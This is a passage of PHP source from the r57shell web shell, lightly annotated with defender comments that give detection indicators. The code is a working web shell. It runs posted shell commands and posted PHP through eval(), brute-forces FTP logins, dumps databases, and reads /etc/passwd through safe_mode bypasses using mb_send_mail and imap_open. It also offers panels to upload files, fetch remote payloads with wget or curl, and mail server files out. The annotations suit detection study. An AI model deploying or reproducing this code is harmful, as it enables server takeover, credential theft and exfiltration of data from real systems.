2014   $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
2015   @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
2016   $lines = file ('/tmp/mb_send_mail');
2017   foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
2018   break;
2019   case 'test6':
2020   $stream = @imap_open('/etc/passwd', "", "");
2021   $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
2022   for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
2023   @imap_close($stream);
2024   break;
2025   case 'test7':
2026   $stream = @imap_open($_POST['test7_file'], "", "");
2027   $str = @imap_body($stream, 1);
2028   echo $str;
2029   @imap_close($stream);
2030   break;
2031  }
2032 }
2033 else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
2034  $cmd_rep = ex($_POST['cmd']);
2035  if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
2036  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
2037 if ($_POST['cmd']=="ftp_brute")
2038  {
2039  $suc = 0;
2040  foreach($users as $user)
2041   {
2042   $connection = @ftp_connect($ftp_server,$ftp_port,10);
2043   if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
2044   else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
2045   @ftp_close($connection);
2046   }
2047  echo "\r\n-------------------------------------\r\n";
2048  $count = count($users);
2049  if(isset($_POST['reverse'])) { $count *= 2; }
2050  echo $lang[$language.'_text97'].$count."\r\n";
2051  echo $lang[$language.'_text98'].$suc."\r\n";
2052  }
// php_eval handler: removes every "<?" and "?>" from the posted php_eval field and hands the
// remainder to eval(). This is execution of request-supplied PHP by design.
// Output lands inside the "report" textarea opened earlier in the page.
// Detection: POST bodies carrying cmd=php_eval together with a php_eval field. Statically,
// eval() fed from $_POST with only tag-stripping in between is a high-confidence web-shell
// indicator. The "@" prefixes silence ordinary warnings from these calls.
2053 if ($_POST['cmd']=="php_eval"){
2054  $eval = @str_replace("<?","",$_POST['php_eval']);
2055  $eval = @str_replace("?>","",$eval);
2056  @eval($eval);}
2057 if ($_POST['cmd']=="mysql_dump")
2058  {
2059   if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
2060   $sql = new my_sql();
2061   $sql->db   = $_POST['db'];
2062   $sql->host = $_POST['db_server'];
2063   $sql->port = $_POST['db_port'];
2064   $sql->user = $_POST['mysql_l'];
2065   $sql->pass = $_POST['mysql_p'];
2066   $sql->base = $_POST['mysql_db'];
2067   if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
2068   else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
2069   else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
2070   else {
2071    if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
2072    else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
2073    else { echo "[-] ERROR! Can't write in dump file"; }
2074    }
2075  }
2076 echo "</textarea></div>";
2077 echo "</b>";
2078 echo "</td></tr></table>";
2079 echo "<table width=100% cellpadding=0 cellspacing=0>";
/**
 * Builds the pair of collapse/expand icons shown next to a panel title.
 *
 * Both <img> tags are served by this same script (PHP_SELF with ?img=1 and ?img=2). The onClick
 * handlers hide or show the element whose DOM id is $id and record the state in a cookie named
 * after that id ("<id>=0" hidden, "<id>=1" shown). Tooltips come from the global $lang table,
 * keys "<language>_text109" and "<language>_text110".
 *
 * $id and PHP_SELF are concatenated into HTML/JS without escaping; the callers visible in this
 * listing pass literal ids such as 'id1'.
 *
 * @param string $id DOM id of the panel to toggle
 * @return string HTML fragment
 */
2080 function up_down($id)
2081  {
2082  global $lang;
2083  global $language;
2084  return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';
2085  }
/**
 * Returns the opening <div> tag for a collapsible panel.
 *
 * When a cookie named $id exists and loosely equals 0 the div is emitted with
 * style="display: none;"; otherwise it is emitted without a style. The cookie is the one
 * written by the onClick handlers that up_down() generates.
 *
 * Defender note: request cookies named id1, id2, ... with values 0/1 sent to a single PHP file
 * are a weak corroborating indicator of this panel UI; they are not conclusive on their own.
 *
 * @param string $id DOM id (also the cookie name); inserted into the tag unescaped
 * @return string opening <div> tag
 */
2086 function div($id)
2087  {
2088  if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
2089  return '<div id="'.$id.'">';
2090  }
2091 if(!$safe_mode){
2092 echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
2093 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
2094 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2095 echo $te.'</div>'.$table_end1.$fe;
2096 }
2097 else{
2098 echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
2099 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
2100 echo $te.'</div>'.$table_end1.$fe;
2101 }
2102 echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
2103 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2104 echo $te.'</div>'.$table_end1.$fe;
2105 if($safe_mode){
2106 echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
2107 echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2108 echo $te.'</div>'.$table_end1.$fe;
2109 }
2110 if($safe_mode && $unix){
2111 echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
2112 echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2113 echo $te.'</div>'.$table_end1.$fe;
2114 }
2115 if(!$safe_mode){
2116 foreach ($aliases as $alias_name=>$alias_cmd)
2117  {
2118  $aliases2 .= "<option>$alias_name</option>";
2119  }
2120 echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
2121 echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2122 echo $te.'</div>'.$table_end1.$fe;
2123 }
2124 echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
2125 echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2126 echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2127 echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2128 echo $te.'</div>'.$table_end1.$fe;
// Panel "id8": rendered when $safe_mode is falsy and $unix is truthy.
// Reuses the field names of panel id7 (`s_text`, `s_dir`, `s_mask`) but defaults the mask
// to '*.[hc]' and posts hidden cmd=find_text, so only the cmd value tells the two apart.
// The handler for cmd=find_text is outside this chunk.
2129 if(!$safe_mode && $unix){
2130 echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
2131 echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2132 echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2133 echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2134 echo $te.'</div>'.$table_end1.$fe;
2135 }
// Panel "id9": emitted unconditionally. A textarea named `php_eval` posted with hidden
// cmd=php_eval and dir=$dir; the code that consumes it is outside this chunk.
// For defenders: a POST carrying cmd=php_eval together with a php_eval body parameter is a
// high-signal pattern for web-server log review and WAF rules.
2136 echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
2137 echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
// The previously posted value is echoed back into the textarea without HTML escaping.
// The default text is a commented-out sample naming r57shell.php and /etc/passwd; both
// literals are usable as static content-scan strings.
2138 echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
2139 echo "</textarea>";
2140 echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2141 echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2142 echo "</div></div></font>";
2143 echo $table_end1.$fe;
// Panels "id10" and "id11": shown only when $safe_mode is truthy (id10 additionally
// requires $curl_on). Each posts one path field (`test1_file` / `test2_file`, default
// "/etc/passwd") with hidden cmd=test1 / cmd=test2 and dir=$dir.
// What the test1/test2 handlers do is not visible in this chunk — presumably file-read
// checks under safe_mode; confirm against the handler code.
2144 if($safe_mode&&$curl_on)
2145 {
2146 echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
2147 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2148 echo $te.'</div>'.$table_end1.$fe;
2149 }
2150 if($safe_mode)
2151 {
2152 echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
// NOTE(review): this panel emits an extra <table class=table1 ...> that the other panels
// do not; whether $ts already opens a table is not visible in this chunk.
2153 echo "<table class=table1 width=100% align=center>";
2154 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2155 echo $te.'</div>'.$table_end1.$fe;
2156 }
// Panels "id12" and "id13": shown when $safe_mode is truthy and $mysql_on / $mssql_on is set.
// id12 fields: test3_md ("mysql"), test3_ml ("root"), test3_mp ("password"),
// test3_port ("3306"), test3_file ("/etc/passwd"), hidden cmd=test3.
// id13 fields: test4_md ("master"), test4_ml ("sa"), test4_mp ("password"),
// test4_port ("1433"), test4_file ("dir"), hidden cmd=test4.
// The password fields are rendered as type 'text' and a previously posted password is echoed
// back into the page. The test3/test4 handlers are outside this chunk.
2157 if($safe_mode&&$mysql_on)
2158 {
2159 echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
2160 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2161 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2162 echo $te.'</div>'.$table_end1.$fe;
2163 }
2164 if($safe_mode&&$mssql_on)
2165 {
2166 echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
2167 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2168 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2169 echo $te.'</div>'.$table_end1.$fe;
2170 }
// Panels "id22", "id23", "id24": shown only under $safe_mode, each gated on the presence of
// one PHP function (mb_send_mail plus $unix, imap_list, imap_body respectively).
// Each posts a single path field (test5_file / test6_file / test7_file) with hidden
// cmd=test5 / test6 / test7 and dir=$dir; test6_file defaults to $dir, the others to
// "/etc/passwd". The handlers are outside this chunk.
// For defenders: the function_exists() gates show which extensions this page probes for;
// where they are not needed, listing them in disable_functions or unloading the extension
// keeps these panels from rendering.
2171 if($safe_mode&&$unix&&function_exists('mb_send_mail')){
2172 echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts;
2173 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2174 echo $te.'</div>'.$table_end1.$fe;
2175 }
2176 if($safe_mode&&function_exists('imap_list')){
2177 echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts;
2178 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2179 echo $te.'</div>'.$table_end1.$fe;
2180 }
2181 if($safe_mode&&function_exists('imap_body')){
2182 echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts;
2183 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2184 echo $te.'</div>'.$table_end1.$fe;
2185 }
// Panel "id14": rendered when the file_uploads ini setting is enabled.
// Unlike the other panels it writes its own <form name=upload ... multipart/form-data>
// tag instead of $fs. Fields: file `userfile`, checkbox `nf1`, text `new_name`, hidden dir=$dir
// (no hidden cmd field). The code that stores the upload is outside this chunk.
// For defenders: a multipart POST with a `userfile` part and these sibling fields, sent to a
// script that is not a known upload endpoint, is worth alerting on.
2186 if(@ini_get('file_uploads')){
2187 echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2188 echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
2189 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
2190 echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2191 echo $te.'</div>'.$table_end1.$fe;
2192 }
// Panel "id15": rendered when $safe_mode and $windows are both falsy.
// Fields: select `with` (wget, fetch, lynx, links, curl, GET), text `rem_file`
// (default 'http://'), text `loc_file` (default $dir), hidden dir=$dir; no hidden cmd field.
// How the handler uses `with`, `rem_file` and `loc_file` is not visible in this chunk.
// For defenders: a web-server account spawning one of the listed client programs is a
// useful process-lineage detection for this panel.
2193 if(!$safe_mode&&!$windows){
2194 echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
2195 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2196 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2197 echo $te.'</div>'.$table_end1.$fe;
2198 }
// Panel "id16": emitted unconditionally. Fields: text `d_name` (default $dir),
// hidden cmd=download_file and dir=$dir, radio group `compress`.
// The handler for cmd=download_file is outside this chunk.
2199 echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
2200 echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
// $arh collects the compression radio buttons; an option is offered only when the matching
// function (gzcompress / gzencode / bzcompress) exists. 'none' is always offered.
// $arh is reused later in the file by the mail-file form, so this block must run first.
2201 $arh = $lang[$language.'_text92'];
2202 if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
2203 if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2204 if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
2205 echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
2206 echo $te.'</div>'.$table_end1.$fe;
// Panel "id17": rendered when ftp_connect() exists. Two side-by-side forms (each wrapped in
// $fs ... $fe) that share the same field names and differ in the hidden cmd value:
//   left  form: cmd=ftp_file_down
//   right form: cmd=ftp_file_up
// Shared fields: ftp_server_port ("127.0.0.1:21"), ftp_login ("anonymous"),
// ftp_password ("billy@microsoft.com"), ftp_file ("/ftp-dir/file"), loc_file ($dir),
// select ftp_mode (FTP_BINARY / FTP_ASCII), hidden dir=$dir.
// The FTP password is rendered as a plain text input and a posted value is echoed back.
// The transfer code is outside this chunk.
2207 if(@function_exists("ftp_connect")){
2208 echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2209 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
2210 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2211 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2212 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2213 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2214 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2215 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2216 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
2217 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2218 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
2219 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2220 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2221 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2222 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2223 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2224 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2225 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2226 echo $te."</td>".$fe."</tr></div></table>";
2227 }
// Panel "id18": rendered when $unix is truthy and ftp_connect() exists.
// Fields: text `ftp_server_port` (default "127.0.0.1:21"), checkbox `reverse`,
// hidden cmd=ftp_brute. Unlike most panels, no hidden `dir` field is sent.
// The handler for cmd=ftp_brute is outside this chunk.
2228 if($unix && @function_exists("ftp_connect")){
2229 echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
2230 echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
// NOTE(review): $_SERVER['PHP_SELF'] is written into an unquoted href without escaping.
// The link target is the script itself with the query string "users".
2231 echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2232 echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
2233 echo $te.'</div>'.$table_end1.$fe;
2234 }
// Panel "id19": rendered when mail() exists. Two side-by-side forms:
//   left  form: cmd=mail      — fields to, from, subj ("hello billy"), textarea `text`
//   right form: cmd=mail_file — fields to, from, subj ("file from r57shell"), loc_file ($dir),
//               radio group `compress` built from $arh
// Defaults: to "piero@kralpalace.org", from "billy@microsoft.com".
// $arh is assigned earlier in the file; this block only reads it.
// The sending code is outside this chunk.
// For defenders: the default addresses and subjects are fixed literals, usable as content-scan
// strings and as search terms in outbound mail logs.
2235 if(@function_exists("mail")){
2236 echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2237 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2238 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("piero@kralpalace.org"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2239 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2240 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
// The posted `text` value is concatenated into the textarea without HTML escaping.
2241 echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2242 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2243 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2244 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2245 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("piero@kralpalace.org"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2246 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2247 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
2248 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2249 echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
2250 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2251 echo $te."</td>".$fe."</tr></div></table>";
2252 }
// Panel "id20": rendered when at least one of $mysql_on, $mssql_on, $pg_on, $ora_on is set.
// $select is a <select name=db> listing only the engines whose flag is set; it is emitted
// in both forms below.
//   left  form: cmd=mysql_dump — db_server, db_port, mysql_l, mysql_p, mysql_db, mysql_tbl,
//               checkbox `dif`, text dif_name ("dump.sql")
//   right form: cmd=db_query   — db_server, db_port, mysql_l, mysql_p, mysql_db,
//               textarea `db_query`
// Defaults: localhost, 3306, root, password, mysql, user. The port default is "3306" whatever
// engine is selected, and the field names keep the mysql_ prefix for every engine.
// The password field is a plain text input. The database code is outside this chunk.
2253 if($mysql_on||$mssql_on||$pg_on||$ora_on)
2254 {
2255 $select = '<select name=db>';
2256 if($mysql_on) $select .= '<option>MySQL</option>';
2257 if($mssql_on) $select .= '<option>MSSQL</option>';
2258 if($pg_on)    $select .= '<option>PostgreSQL</option>';
2259 if($ora_on)   $select .= '<option>Oracle</option>';
2260 $select .= '</select>';
2261 echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2262 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
2263 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2264 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2265 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2266 echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
